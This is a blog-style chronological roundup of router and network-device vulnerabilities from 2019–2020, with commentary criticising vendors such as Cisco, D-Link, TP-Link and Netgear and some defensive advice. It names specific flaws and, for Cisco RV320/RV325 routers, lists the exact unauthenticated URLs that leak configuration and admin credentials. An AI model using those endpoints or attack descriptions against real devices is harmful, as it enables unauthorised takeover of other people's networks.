Their research uncovered five bugs including two methods attackers can use to gain persistent unauthenticated root access to the router. They also found 7 open LAN side ports. Much of this article is focused on the specifics on the bugs and it leaves out the implications. Are the bugs exploitable LAN side or WAN side or both? Does a user have to be logged in to exploit the bug or not? Despite this, the article is very useful at the end. ISE first contacted Tenda in January 2020. Here, six months later, no response from Tenda at all. And, as always with router bugs, it is likely that similar flaws exist in other firmware versions and other Tenda routers.
JUNE 2020
79 Netgear devices are buggy and the company did nothing
SOHO Device Exploitation
by Adam of Grimm June 15, 2020
Quoting: "This is just one more example of how SOHO device security has fallen behind as compared to other modern software ... As such, it’s trivial to overflow the stack buffer." The author found a pre-authentication stack overflow vulnerability in the Netgear R7000 router running firmware version 1.0.9.88. The vulnerability, which allows for remote code execution, has been present in the R7000 since it was released in 2013. But that is only the beginning. Adam was able to identify 79 different Netgear devices and 758 Netgear firmware images that included the buggy code. The oldest buggy firmware dated back to 2007. The vulnerability was reported to Netgear on May 7, 2020 and they seemed to have ignored it. Using assorted scripts, Adam created an exploit for each of the 758 buggy firmware images. Then, he tested his exploit on 28 of the vulnerable devices to ensure that it worked as expected. Among the confirmed buggy routers are the Netgear R6250, R6300v2, R6400, R7000, R8000, R8300 and the R8500. Criticizing Netgear he said "In addition to lacking stack cookies, the web server is also not compiled as a Position-independent Executable (PIE), and thus cannot take full advantage of ASLR. As such, it’s trivial to find a ROP gadget within the httpd binary ... that will call system with a command taken from the overflown stack."
Bugs in a very old D-Link router
D-Link leaves severe security bugs in home router unpatched
by Ionut Ilascu of Bleeping Computer June 12, 2020
The D-Link DIR-865L router was released in 2012 and is no longer supported for U.S. consumers. However, on the website for European countries, the status is "End of Sale" which means that it can no longer be purchased but it is still supported by the vendor. Researchers at Palo Alto Networks' Unit 42 found and reported six security vulnerabilities in the DIR-865L in late February 2020. Now, over three months later, D-Link released beta firmware that fixes three of the six flaws. Two bigger issues: 1) What about other models? Unit 42 warned that newer routers may be vulnerable to the same flaws because they share a common code base. A good router vendor will check for the same flaw in all their products. A bad router vendor will not. The response from D-Link said nothing about any other models. 2) Who cares about such an old router? Why is Unit 42 even looking at ancient consumer devices? In the US, the DIR-865L went out of support in Feb. 2016.
APRIL 2020
Wavlink does not respond to security flaws - another brand to avoid
Multiple Vulnerabilities in Wavlink Router leads to Unauthenticated
Remote Code Execution
by James Clee April 18, 2020
Clee started a new hobby - buying cheap Chinese technology to see what he could find out about security. He startee with the Wavlink WL-WN530HG4 which sells for $30.
An interesting read that resulted in CVE-2020-10971 and CVE-2020-10972. He found back doors and miserable password verifications. Quoting: "... so an attacker with the right background information about the device could achieve RCE fairly easily." Worse, is that he attempted multiple times to contact Wavlink using several different support contacts and they ignored him. This is not a company you want to deal with.
A few days later he wrote about the Wavlink WL-WN579G3 and WL-WN579A3 Wi-Fi Extenders. They were just as bad as the router. He found that lots of web pages are externally accessible without authentication and they contain sensitive data. He could get the username and password without authenticating to the devices. Once again, Wavlink did not respond to any of his attempts at communication.
Sophos quickly issues patch for their firewalls
Hackers are exploiting a Sophos firewall zero-day
by Catalin Cimpanu for ZDNet April 26, 2020
Bad guys were found to be attacking a previously unknown SQL injection vulnerability in the Sophos XG enterprise firewall. Sophos learned about the problem on April 22nd when a customer reported something strange. They published an emergency security update on April 25th. The firewalls can self-update, though I doubt every user has that enabled. No surprise to learn that vulnerable firewalls had either their administration or User Portal control panel exposed to the Internet. The bug let bad guys steal files from the XG firewall, and those files could include usernames and hashed passwords for the firewall administrator, for the firewall portal admins and for user accounts used for remote access to the device. Bad guys could also learn the firewall's license and serial number, and see some user emails. Sophos researchers named the malware Asnarok.
From what I have seen, the Sophos response was great. You could not ask for more. Not only did they fix the bug quickly, they also documented the heck out of the issue.
MARCH 2020
Multiple issues with OpenWRT
Uncovering OpenWRT remote code execution (CVE-2020-7982)
by Guido Vranken of ForAllSecure March 24, 2020
The OpenWRT package manager, opkg, does not check the SHA256 hash of anything it downloads. This is compounded by it downloading updates over HTTP rather than HTTPS. In addition, the opkg unpacker is buggy; malformed data leads to a variety of memory violations. opkg on OpenWrt runs as root with write access to the entire filesystem, so arbitrary code could be injected by means of forged .ipk packages with malicious payloads. Also vulnerable is the LEDE fork of OpenWRT. One of the bugs was introduced in February 2017. Fixes are available.
Two Zero Day bugs in DrayTek routers (Updated)
A mysterious hacker group is eavesdropping on corporate email and FTP traffic
by Catalin Cimpanu of ZDNet March 28, 2020
According to Netlab, the network security division of Chinese security firm Qihoo 360, bad guys have been hacking into DrayTek routers to eavesdrop on FTP and email traffic. They first observed this in early December 2019. There are two different zero-day flaws in three DrayTek Vigor devices, the 2960, 3900 and 300B. The bugs could allow for arbitrary code execution on a vulnerable system. This could allow an attacker to eavesdrop on network traffic, operate SSH and Web based backdoors, and create system accounts. One flaw is in the login mechanism and it allows attackers to hide malicious code inside the router's username field. This malicious code can grant the hackers control over the router. Next, the attackers started recording traffic coming to port 21 (FTP), 25 (email), 110 (email) and 143 (email). These are four very old protocols and they still use plain text. It is assumed the attackers were looking for FTP and email passwords. The second flaw is in the "rtick" process and attackers used it to create backdoor accounts on the hacked routers. Qihoo says that around 100,000 vulnerable DrayTek devices are online. DrayTek issued updated firmware six days after they learned of the problem. And, DrayTek impressed me with this " The issue only affects the Vigor3900 / 2960 / 300B and is not known to affect any other DrayTek products". This is rare, vendors usually fix only the devices with the reported problem.
Multiple flaws in multiple Netgear routers
Thousands of Netgear routers are at risk of getting hacked: What to do
by Paul Wagenseil of Toms Guide March 5, 2020
Nearly 50 Netgear devices need firmware patches ASAP. The devices are seven modem-router gateways, 40-odd routers (including some Nighthawk and Orbi models) and one range extender. The worst of the flaws lets attackers remotely install malware on one router. A "pre-authentication command injection security vulnerability" on five routers could also lead to total network takeover. For a number of the flaws Netgear has not provided specific details. Does your Netgear router need an update? Turns out, this is a hard question to answer. Netgear does a terrible job of communicating to its customers what each router's model number is. They hardly ever use the actual model number in their consumer marketing and packaging. For example, the AC4000 Nighthawk X6S Tri-Band WiFi Router is the R8000P. To find the model number, turn the device over and look at the sticker on the bottom. The update procedure differs among the various routers. The article has a full list of the buggy router model numbers.
JANUARY 2020
Millions of Internet boxes are vulnerable
Cable Haunt
by Lyrebirds ApS January 11, 2020
Bad news: untold millions of devices are vulnerable. Good news: it is not easy to exploit the bug. Bad news: despite all the headlines, it is not only modems that are vulnerable, so too are gateways (combination modem/router). Bad news: In the US, this will never be fixed. ISPs are virtual monopolies and thus have no reason to do a good job. Fixing this takes time, effort and money and few very customers will ever learn about it. I tried to get a response from Spectrum, it was a waste of time. The company that found the flaw offered a tester script for Linux that seems useless. They also offered some JavaScript that can copied and pasted into a browser console to test if your Internet box is vulnerable. With their JavaScript, I confirmed that the Netgear CM600 modem is vulnerable. They leave out that you need to copy/paste their Javascript as a whole, not each line individually. And, you may need to change the port number, which is why I suggest using nmap below. Netgear only offers free tech support for the first 90 days, so I can not ask them about this. Not that it matters, modem firmware can only be updated by an ISP, at least in the US.
What to do?
I suppose you could try and learn the firmware version that your modem or gateway is running and then try to find out if it has been patched for the Cable Haunt flaw. In the US, this is almost definitely a waste of time.
First, see if your Internet box uses Broadcom. If not, you are safe. The Toms Guide article below has links to pages that show this for Arris and Netgear devices. For other companies see approvedmodems.com. If that fails, perhaps look for the technical specs of your modem or gateway. Maybe try to contact the hardware manufacturer. If Broadcom ...
If you have a router/modem combination box, run nmap on the LAN side IP address looking at all 65,535 TCP ports. If you have a router and a modem as stand-alone devices, run the same nmap against 192.168.100.1. After the nmap scan, try to use HTTP and HTTPS to access every open port. The buggy Spectrum Analyzer looks like this on a Netgear modem. Found a Spectrum Analyzer? If so, nag either your ISP or the hardware vendor for fixed software. Lotsa luck (probably won't happen). Better yet, block access to the buggy device. If its a combination modem/router, there should be some sort of LAN side restrictions about which devices can logon to the box. For more, see the Security Checklist page here, the section on Local Administration. If you have a router and a modem as separate devices, you need a nerd to configure a defense. One option is something called a static route - some routers let you configure this, some do not. If your router supports firewall rules (rare), see my blog below about creating an outbound firewall rule to block modem access. As a rule consumer routers, such as AmpliFi from Ubiquiti or Google WiFi do not offer outbound firewall rules.
DECEMBER 2019
Multiple bugs in Ruckus Access Points
A ton of Ruckus Wireless routers are vulnerable to hackers
by Zack Whittaker of TechCrunch December 28, 2019
Despite the headline, the buggy devices are Access Points not routers. Security researcher Gal Zror discovered 10 bugs in Ruckus devices. Three are biggies. They are in the web interface of the Unleashed line of APs. The flaws let a bad guy take complete control of a vulnerable router remotely and without needing a password. As bad as bad gets.
Patches have been issued but the routers do not self-update. Ruckus Cloud access points are not buggy. Neither are their SmartZone-enabled devices. This was made public at a presentation at the 36th Chaos Communication Congress called Lecture: Don't Ruck Us Too Hard - Owning Ruckus AP Devices. This surprised me. For one, its the first mention of Ruckus in my list of bugs. Second, Ruckus is a high end company. Then again, Cisco is also high end and their software has a terrible track record when it comes to bugs and flaws and vulnerabilities.
More buggy D-Link routers
D-Link DIR-859 —Unauthenticated RCE (CVE-2019–17621)
by Miguel Méndez Z. Decembe 24, 2019
Back in Oct. 2019, we learned of a Remote Code Execution bug in a single D-Link router, the DIR-859 (CVE-2019-17621). The bug could be exploited by anyone on the LAN to take full control of the router. Of course, many routers from the same company share the same firmware (operating system) so it was not a surprise when, in Nov. 2019, we learned that many more D-Link routers share the same bug. Some of the buggy routers are too old and will not be updated. Some have already had fixes released. Still more, are slated to have fixes released soon. These are the buggy models: DIR-818Lx DIR-822, DIR-823, DIR-859, DIR-865L, DIR-868L, DIR-869, DIR-880L, DIR-890, DIR-885, DIR-895. In some cases, the router firmware must be updated twice. Ugh. The vulnerability is in the code used to manage UPnP requests.
Four buggy TP-Link routers
TP-Link Archer Router Vulnerability Voids Admin Password, Can Allow Remote Takeover
by Grzegorz Wypych and Limor Kessem of IBM X-Force Red December 16, 2019
There are critical bugs in the TP-Link Archer C5 v4, Archer MR200v4, Archer MR400v3 and the MR6400v4. Are other TP-Link routers safe? Don't know. No one said anything about other routers having been tested. The bug lets a bad guy take full admin control of the router. First, the bad guy has to trick the router as to the source of a login request. This is not hard. Then, the bad guy simply has to provide a password that is the wrong length. If the password is too short, it locks out access to the router. If the password is too long, it voids the current password letting the bad guy login without a password. TP-Link never fails to impress. Firmware updates are available. However, as the article below by Paul Wagenseil details, the firmware update process is miserable. The Archer MR200, MR400 and MR6400 are LTE-based routers sold in the European Union. The Archer C5 AC1200 is a home Wi-Fi router, sold in many countries.
NOVEMBER 2019
More buggy D-Link routers that will not be fixed
D-Link Adds More Buggy Router Models to 'Won’t Fix' List
by Tom Spring of ThreatPost November 19, 2019
A new bug in D-Link routers will not be fixed because the routers are too old to bother with (they are End-of-Life or EoL). The bug allows a bad guy, who does not know any passwords, to access the web configuration interface of the router. The buggy devices are: DIR-866, DIR-655, DHP-1565, DIR-652, DAP-1533, DGL-5500, DIR-130, DIR-330, DIR-615, DIR-825, DIR-835, DIR-855L, and DIR-862. D-Link suggests disabling remote administration, resetting the affected routers and using a complicated router password.
It is not clear if this bug is similar to the bug (CVE-2019-16920) that FortiGuard Labs reported last month. That bug impacted 10 of the same routers. Spring puts this bug in perspective, noting a long history of bugs in D-Link routers. A September 2019 bug can leak passwords. A May 2019 bug allowed DNS hijacking. In 2017, we learned that the D-Link DIR-130 was one of 25 routers that could be exploited by the CIA. Also in 2017, the 850L and AC1200 had multiple vulnerabilities that could allow a hacker to gain remote access and control of device.
Zero Day flaw in the D-Link DIR-878 router. Others too?
Tianfu Cup Round-Up: Safari, Chrome, D-Link Routers and Office 365 Successfully Hacked
by Elizabeth Montalbano of ThreatPost November 18, 2019
Hackers, at the annual Tianfu Cup gathering over the weekend, successfully compromised the D-Link DIR-878 router using a zero-day vulnerability. Note the plural use of the word hackers. The router was hacked by seven, yes, seven, different groups. It has been a few days and, so far, no response from D-Link on their security bulletin page. Will they acknowledge the flaw? Will they fix it? Time will tell. The bigger picture, however, involves other D-Link router. It is likely that other similar routers share the same buggy software. And, some recent history: in March 2019 the German Federal Office for Information and Security (BSI) issued a warning about bugs in the DIR-878 and the DIR-825. The bugs are easily exploited and let attackers bypass the logon processes and execute malicious code.
OCTOBER 2019
Ten D-Link routers that should be thrown away
Multiple D-Link routers vulnerable to remote command execution
by US Cert October 23, 2019
These 10 D-Link routers are buggy, will not be fixed and should be thrown away: DIR-655, DIR-866L, DIR-652, DHP-1565, DIR-855L, DAP-1533, DIR-862L,
DIR-615, DIR-835 and the DIR-825. A remote, unauthenticated attacker may be able to execute commands with root privileges on a buggy router. This can happen as the result of viewing a specially-crafted web page. The bug was publicly disclosed by Fortinet's FortiGuard Labs, same as below. This appears to be the same bugs as below, just that is has been found in six more routers.
D-Link won't fix bugs in four of its routers
D-Link Won't Fix Serious Security Flaw on Four Wi-Fi Routers
by Paul Wagenseil of Tom's Guide October 8, 2019
Beware the D-Link DIR-652, DIR-655, DIR-866L and DHP-1565 routers. They have critical bugs. An attacker halfway across the world could hijack these routers without needing a password. Everyone suggests throwing these routers away. I agree. End of Life is the techie term for the computing devices that are too old to bother with. As Seinfeld might have said: No bug fixes for you! Manufacturers win twice with routers that are deemed EoL: they don't have spend money fixing bugs and they motivate customers to buy new routers. Usually EoL devices are no longer sold. Not so with D-Link. Three of them can still be bought new from third-party sellers on Amazon's U.S. website. Is the same bug in any other D-Link routers? None of our business. Fortinet, which found the bug, does not say which or how many routers they tested. And, the D-Link response is limited to these four routers with no mention of any others.
SEPTEMBER 2019
Bugs Bugs Bugs - 125 in all
SOHOpelessly Broken 2.0
by Independent Security Evaluators September 16, 2019
My summary is on the News page.
Here we go again - another LAN side protocol available on WAN
Protocol used by 630,000 devices can be abused for devastating DDoS attacks
by Catalin Cimpanu of ZDNet August 27, 2019
Just as with UPnP all those years ago, routers (and IoT devices) are exposing a protocol meant exclusively for LAN-side use to the Internet at large. This time the protocol is WSD (a.k.a. WS-Discovery and Web Services Dynamic Discovery). Bad guys abuse WSD to create DDoS attacks. WSD listens on UDP port 3702 (some articles also referenced TCP port 3702). Like UPnP, WSD is a protocol for LAN side devices to discover each other and their capabilities. Is there a printer in the house? WSD communication starts with requests to the IPv4 multicast address 239.255.255.250. IPv6 uses FF02::C (link-local scope). Being exposed to the WAN is only one bug, the other is that devices should only respond to requests to these two IP addresses. WSD responses sometimes come from port 3702, sometimes from random high numbered ports. Akamai noted that most vulnerable devices were CCTV cameras and DVR systems. No article said anything about the failure of the routers to block these vulnerable devices. UPnP haunts us still.
AUGUST 2019
Four router vendors refuse to fix bugs
Cross-Router Covert Channels
by Adar Ovadya, Rom Ogen, Yakov Mallah, Niv Gilboa and Yossi Oren of Ben-Gurion University August 2019
Researchers at Ben-Gurion University found multiple ways to communicate between the two Wi-Fi networks typically offered by a router. They refer to these two networks as Host and Guest, most people refer to them as Private and Guest. The research was presented at the 13th USENIX Workshop on Offensive Technologies (WOOT). They tested routers from TP-Link, D-Link, Edimax and Linksys and all the companies refused to fix anything. Quoting: "We sent a draft of our findings to the manufacturers of the routers ... during May 2019. During June 2019 the Belkin/Linksys security response team notified us that they do not intend to fix the vulnerability we disclosed. None of the other router vendors responded to our disclosure". As I say elsewhere on this site, don't use a consumer router.
The bugs are pretty obscure. For example, on some routers, a DHCP NAK from one network is erroneously sent to the other network which can be used to send a small amount of data to the other network. They also discovered that quickly joining and leaving an IGMP group from the Private network caused an IGMP Membership Query packet to be sent to both the Private and Guest networks. This too can be used transfer data between the two networks. There were also some timing attacks.
Bugs found in multiple 4G Hotspots
Reverse Engineering 4G Hotspots for fun, bugs and net financial loss
by G Richter of Pen Test Partners August 10, 2019
A 4G hotspot is a router. The biggest difference is that it connects to the Internet via 4G rather than an Ethernet cable. Pen Test Partners found multiple vulnerabilities in several well known vendors Mi-Fi devices, including pre- and post-auth command injection and code execution. The vendors involved were generally poor at responding to disclosure attempts. ZTE was the worst, they responded that a device was end of life, so the bugs would not be fixed ... yet they were still selling it from their own online store! They also found bugs in Netgear and TP-Link devices.
JUNE 2019
Critical bugs in four TP-Link Wi-Fi Range Extenders
Critical RCE Vulnerability in TP-Link Wi-Fi Extenders Can Grant Attackers Remote Control
by Grzegorz Wypych of Security Intelligence June 18, 2019
Four TP-Link Wi-Fi extenders have a critical remote code execution (RCE) vulnerability. The bug lets a remote attacker get complete control over the device. The attacker does not need to login or authenticate to the device to exploit the bug. The problem is triggered with a malformed user agent field in HTTP headers. The buggy devices are the RE365 (sold in Europe), the RE650 (sold in the US, UK and Canada), the RE350 (same 3 countries) and the RE500 (sold in the US and Canada). Patches have been issued but device owners have to manually download them and install them. First, they have to insure the correct hardware version for the available firmware, then they have to get the firmware for their country. All processes on these devices run with root-level access which is just asking for trouble.
Still another critical bug in Cisco software
Cisco IOS XE Software Receives Fix Against High-Severity Flaw
by Ionut Ilascu of Bleeping Computer June 13, 2019
Far too much of this web page is devoted to bugs in Cisco software. They just released an updated version of their IOS XE operating system to patch a high severity bug - insufficient cross-site request forgery (CSRF) protections in the web-based user interface of the software. The bug can be exploited by an unauthenticated, remote attacker who could persuade an already logged in user of the web interface to follow a malicious link. The link could then perform arbitrary actions with the privilege level of the victimized user. If the victim is an administrator, bad guys could modify the configuration, run commands and even reload a vulnerable device. The good news is that a victim has to be logged in to the system before they can be exploited. Also, exploitation requires the HTTP Server feature to be active and it is not always active by default (this is version dependent).
MAY 2019
Cisco screws up for the millionth time
Thrangrycat by Red Balloon Security May 21, 2019
Take a look at the bugs tracked on this site. Lots of Cisco issues over the last few years. Paraphrasing Red Balloon: There are two bugs that affect about 150 different Cisco devices. The first, known as Thrangrycat, allows an attacker to fully bypass the Trust Anchor module (TAm) via Field Programmable Gate Array (FPGA) bitstream manipulation. This is due to multiple hardware design flaws in the TAm. The second is a remote command injection vulnerability against IOS XE version 16 that allows remote code execution as root. By chaining these, an attacker can remotely and persistently bypass Cisco’s secure boot mechanism and lock out all future software updates to the TAm.
The TAm is a proprietary Cisco hardware security module. It is the root of trust that underpins all other Cisco security mechanisms. Thrangrycat allows an attacker to make persistent modification to the TAm, thereby defeating the secure boot process and invalidating the chain of trust at its root. While the flaws are based in hardware, they can be exploited remotely. Since the flaws involve the design of the hardware, it is unlikely that any software patch will fully resolve the fundamental issues. Cisco released a patch for IOS XE and provided the Cisco IOS Software Checker to identify vulnerabilities in Cisco IOS and IOS XE. Cisco is working on patches for Thrangrycat, but notes that the patch will not be a straightforward update for most devices but instead will require "on-premise[s] reprogramming of a low-level hardware component." Patches for many routers, switches and network interface modules will be released between May 2019 and November 2019. As for detection and mitigation, Red Balloon will present this in a talk at BlackHat USA 2019.
TP-Link publicly shamed
Thousands of vulnerable TP-Link routers at risk of remote hijack
by Zack Whittaker of TechCrunch May 22, 2019
Thousands of TP-Link routers are vulnerable to a bug, and it took more than a year for TP-Link to publish the patches on its website. They created the patches, they just didn't publish them. The bug lets a low-skilled attacker to get full remote access to a vulnerable router. The bug was first disclosed to TP-Link in October 2017. Shortly thereafter, they released a patch for the WR940N router. But, the WR740N was vulnerable to the same bug and no patch was released for it. TP-Link was warned about this in January 2018, yet ... nothing until they were publicly shamed by TechCrunch.
Linksys found to be both incompetent and unconcerned with security
Over 25,000 Linksys Smart Wi-Fi routers vulnerable to sensitive information disclosure flaw
by Troy Mursch May 13, 2019
Thirty three Linksys routers are buggy and Linksys will not fix it. They tried to fix it five years ago, but they screwed that up. Yet another confirmation of the opinion I offered on this site from the get-go back in 2015 - avoid consumer routers. The flaw affects Linksys Smart Wi-Fi routers. It allows unauthenticated remote access to sensitive information and its easily exploited by bad guys with little technical knowledge. The routers leak information both about themselves and about every (yes, every) device that has ever connected to them. For connected devices, Linksys always leaks the MAC address, Device name ("TROY-PC") and Operating system. Sometimes it also leaks the device type, model number, and a description of the attached device. As for router information, it leaks the model number, hardware version, serial number, firmware release level, MAC address, the LAN side IP address, WAN settings, firewall status and DDNS settings. Leaking the MAC address lets bad guys determine the physical location of the router. Data provided by BinaryEdge, shows that 25,617 Linksys Smart Wi-Fi routers are currently leaking sensitive information to the public. Among the 33 buggy models are the E4200, EA2700, EA5800, EA6900, EA7300, EA8500, EA9200, WRT1900AC, WRT3200ACM, XAC1900 and WHW03 Velop. The full list is here. This is yet another in a long line of HNAP bugs. The bug can also reveal if a router is using the default password (thousands are) without even trying to login. The worst part is that Linksys tried to fix this five years ago but clearly screwed that up. Then, when contacted about it recently, they had no interest in fixing it properly. Yes, if you disable remote web access you block the information leak. However, Linksys Smart Wi-Fi routers require remote access for the Linksys App to function.
APRIL 2019
29 new Cisco Bugs
Cisco warns over critical router flaw
by Liam Tung of ZDNet April 18, 2019
Cisco has disclosed 29 new vulnerabilities, 5, 6 or 7 of which are doozies. Its too much for tech reporters to digest. One of the critical bugs is in the ASR9000 Series Aggregation Services Routers. The bug is as bad as bad gets, it can be exploited remotely by a bad guy without a password. There is a patch and a workaround. The other critical bugs affect Cisco Wireless LAN Controller software. Another bug is in the Cisco Expressway Series and Cisco TelePresence Video Communication Server. Another biggie is in Cisco Aironet Series Access Points. Finally, there is a critical bug in the Cisco Cluster Management Protocol code in Cisco IOS and Cisco IOS XE. As with the first bug a remote bad guy without a password can obtain full control of vulnerable devices. If the devices accept Telnet connections, a bad guy who sends malformed Telnet options while establishing a connection can execute arbitrary code.
The Threatpost article below offers some context, noting that earlier this month, Cisco re-patched flaws for two high-severity bugs after their first attempt was botched. And, they reported two new router bugs with no fixes or workarounds. Just what you want in a router vendor.
TP-Link, yet again
Buffer Overflow Vulnerability in TP-Link Routers Can Allow Remote Attackers to Take Control
by Grzegorz Wypych and Limor Kessem of IBM Security Intelligence April 8,2019
There is a buffer overflow flaw in the TP-Link TL-WR940N and TL-WR941ND routers. No other models were tested, so it is likely that others in the same family are vulnerable too. These models are old (they are 300Mbps Wi-Fi N) and have been discontinued. The bug allows bad guys to take control of the device from a remote location. Sounds worse than it is. You have to already be logged on to the web interface to exploit the flaw. And, the flaw is in the web interface, so if Remote Administration is disabled, as it often is, then it can not be exploited from overseas. TP-Link issued patches. Why are so many of these reports about ancient routers? Perhaps because if you break a $30 router while hacking it, no big deal.
Three bugs in a Verizon FIOS router
Verizon Fios Quantum Gateway Routers Patched for Multiple Vulnerabilities
by Tenable Research April 9, 2019
Tenable has discovered 3 vulnerabilities in the Verizon Fios G1100 Quantum gateway/router. A Command Injection flaw can only be exploited by a user already logged on to the device. It is exploitable from the LAN side and remotely if Remote Administration is enabled. Because HTTPS is not enforced in the web interface, an attacker on the LAN side can intercept login requests using a packet sniffer and then replay the requests to get admin access to the web interface of the router. Packet sniffing a login request also provides a salted password hash (SHA-512). An unauthenticated attacker can retrieve the password salt simply by visiting a URL in a web browser. Thus, an attacker could perform an offline dictionary attack to recover the original password. Of course, the focus on passwords is because insecure firmware, like this, always uses the same userid. By now, most Verizon FIOS customers should have the updated firmware. If you have a G1100 you should verify this. The real lesson here is not use hardware from an ISP. See the Disclosure Timeline in the first article below and judge the Verizon repsonse for yourself.
MARCH 2019
TP-Link ignores a security problem
TP-Link 'smart' router proves to be anything but smart - just
like its maker: Zero-day vuln dropped after silence
by Thomas Claburn of The Register March 28, 2019
90 days ago Matthew Garrett, a Google employee, informed TP-Link of a bug in their all-in-one SR20 Smart Home Router. TP-Link ignored the problem. To me, this is the more important issue, much more interesting than the bug itself. Garret wrote: "I reported this to TP-Link in December via their security disclosure form, a process that was made difficult by the "Detailed description" field being limited to 500 characters. The page informed me that I'd hear back within three business days - a couple of weeks later, with no response, I tweeted at them asking for a contact and heard nothing back." The SR20 is a combination Zigbee/ZWave hub and router. Ignoring security problems is one of three mistakes TP-Link made. They also ship devices with debug daemons, software intended for testing, that does not belong in a released product.
The software is the TP-Link Device Debug Protocol (tddp) and it has had multiple vulnerabilities in the past. This bug allows allows arbitrary command execution, as root, without authentication, from devices on the LAN. TDDP listens on the WAN side too, but the default firewall configuration blocks it there. To better control access to the router from LAN-side devices see the Local Administration section of my security checklist. Garrett also said that @CoreSecurity had the same experience when they reported TDDP flaws.
FEBRUARY 2019
Bugs in two D-Link routers found by the BSI in Germany
D-Link investigates router vulnerability after German security agency warning
by CET news March 1, 2019
D-Link is investigating bugs in the DIR-825 and DIR-878 after a warning from the German Federal Office for Information and Security (BSI).
The BSI assigned a severity rating of "high". The bugs allow attackers to bypass the logon processes and execute malicious code. The bugs are easily exploited.
The DIR-825 got its last update in 2015, the DIR-878 was last updated in August 2018. My guess (time will tell) is that these bugs will not be fixed.
JANUARY 2019
Can Cisco be trusted?
Multiple vulnerabilities in Cisco Identity Services Engine (Unauth XSS to RCE as root)
by Pedro Ribeiro of Agile Information Security and Dominik Czarnota First published Jan 20, 2019, Last Updated Feb 5, 2019
I don't care much about the details here, and the bugs are not in a router. But Cisco makes routers and the bigger issue, to me, is just how trustworthy Cisco is. They appear on this bug list often. Would you buy a router from them? Quoting: "ISE is distributed by Cisco as a virtual appliance. We have analysed version 2.4.0.357 and found three vulnerabilities ... By putting them all together, we can achieve remote code execution as root, provided we can trap an administrator into visiting the page vulnerable to the stored cross site scripting." Agile dealt with Cisco about these bugs and it did not go well, leading to Ribeiro saying "These actions show Cisco is incredibly negligent with regards to the security of their customers. They are still shipping (and recommending) a product version vulnerable to unauthenticated remote code execution, with a fully working public exploit and no way to track fixes or fixed versions for these vulnerabilities." Ouch.
Three bugs in two Cisco routers
Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability
a Cisco Security Advisory January 23, 2019
This happened fast. In September 2018, three bugs were reported to Cisco by German security firm RedTeam Pentesting. Cisco released patches for the bugs on January 23, 2019. The next day, proof of concept software was released that exploited the bugs. The day after that, bad guys were scanning for vulnerable Cisco routers. The bugs are exploitable on both the LAN and WAN side using just HTTP and/or HTTPS GET requests. The first two bugs expose information about the router to anyone who asks - no password is needed. One of these bugs exposes the Admin password. With that, bad guys can abuse the third bug to run any Linux command on the box. The vulnerable URLs are
http://1.2.3.4/cgi-in/config.exp and
http://1.2.3.4/cgi-bin/export_debug_msg.exp
where 1.2.3.4 is either the LAN side or WAN side IP address of the router. The bugs are CVE-2019-1653 and
CVE-2019-1652. The Cisco RV320 and RV325 routers are popular among both ISPs and large enterprises. On the WAN side, the web interface is exposed on TCP port 8007. Information about attacks on these bugs is on the News page.
Many Cisco switches have a backdoor account
Critical, Unpatched Cisco Flaw Leaves Small Business Networks Wide Open
by Tara Seals of Threatpost January 18, 2019
These Cisco Small Business switches are vulnerable to full remote takeover thanks to a backdoor account: the 200 and 250 Series Smart Switches, the 300 and 350 Series Managed Switches, the 350X, 500 and 550X Series Stackable Managed Switches. There is no patch, but there is a work-around. The most interesting question is whether this is a bug or a feature. It looks like a bug in that it has an official CVE number (CVE-2018-15439) and a critical base CVSS severity rating of 9.8 (really bad). The devices ship with an in-built privileged user account that is used for the initial login. This account can not be removed. It is defined in a software-internal data structure and its not visible in either the running configuration or the startup configuration of an affected device. Bad guys can use this account to log in to a vulnerable device and execute commands with full admin privileges. The work-around is creating a user account with access privilege level of 15 (or higher?). But, if that account gets deleted, the hidden one works again, without notifying system administrators. It sure feels like a back door that can be easily hidden in case the virtual cops are coming. Why else hide the existence of this in-built account? Also, there have been many other backdoors discovered in Cisco software over the last year or so. It has been about 3 months and still no patch.
To keep this page small, router bugs from earlier years have been omitted by default. To see them, click the buttons below.